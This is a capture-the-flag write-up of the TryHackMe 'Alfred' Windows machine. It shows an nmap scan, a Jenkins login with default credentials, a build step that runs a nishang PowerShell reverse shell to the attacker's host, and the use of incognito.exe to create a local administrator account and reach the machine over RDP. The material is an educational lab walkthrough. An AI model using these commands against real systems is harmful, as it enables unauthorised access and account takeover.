Posts Alfred Writeup [THM]
Post
Cancel

Alfred Writeup [THM]

Alfred is a Windows machine from tryhackme , it consists on exploiting Jenkins to obtain a shell and then abusing windows authentication tokens to escalate privileges

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
  nmap -sC -sV -Pn -o nmap.txt 10.10.151.159
  Nmap scan report for 10.10.151.159
  Host is up (0.045s latency).
  Not shown: 997 filtered ports
  PORT     STATE SERVICE    VERSION
  80/tcp   open  http       Microsoft IIS httpd 7.5
  | http-methods:
  |_  Potentially risky methods: TRACE
  |_http-server-header: Microsoft-IIS/7.5
  |_http-title: Site doesn't have a title (text/html).
  3389/tcp open  tcpwrapped
  |_ssl-date: 2020-07-28T14:15:55+00:00; -3s from scanner time.
  8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
  | http-robots.txt: 1 disallowed entry
  |_/
  |_http-server-header: Jetty(9.4.z-SNAPSHOT)
  |_http-title: Site doesn't have a title (text/html;charset=utf-8).
  Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating port 80 we find the following landing page, nothing interesting :

Web

Exploitation

Then we will focus in port 8080 which hosts a jenkins server, where we can login as admin : jenkins Once logged in we find that a project has already been initialized, browsing to http://10.10.151.159:8080/job/project/configure we can configure the project, scrolling down to build we see we can execute windows batch commands, allowing us to upload and trigger a reverse shell

First we set up a webserver using python :

1
  python -m SimpleHTTPServer 80

In this case we will use Powershell to upload it and a Powershell revshell from nishang : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

It is important that we add the following line at the end of the powershell script

1
  Invoke-PowerShellTcp -Reverse -IPAddress 10.11.14.106 -Port 4444

shell

Then we save the configuration , set up netcat, go backwards and click build now

build

Checking netcat we obtain a reverse connection as alfred

1
2
3
4
5
6
7
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.151.159] 49198
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce

Privilege Escalation

We check the privileges user alfred has enabled:

1
2
3
4
5
6
7
8
PS C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                  Description                               State   
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled

We will exploit SeImpersonatePrivilege and SeDebugPrivilege with the help of incognito https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

Transferring the .exe with smbserver :

1
smbserver.py smbfolder .

In the victim machine :

1
copy \\10.11.14.106\smbfolder\incognito.exe

Now with incognito we can just create a user and add it to local administrators group:

1
2
3
4
5
6
7
8
9
10
PS C:\windows\temp> ./incognito.exe add_user writeup I_hope_you_like_it
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to host 127.0.0.1
[+] Successfully added user
PS C:\windows\temp> ./incognito.exe add_localgroup_user Administrators writeup
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user writeup to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group

As port 3389 was open we can login through rdesktop:

1
rdesktop -g 90% -u writeup -p I_hope_you_like_it 10.10.151.159

privesc

This post is licensed under CC BY 4.0 by the author.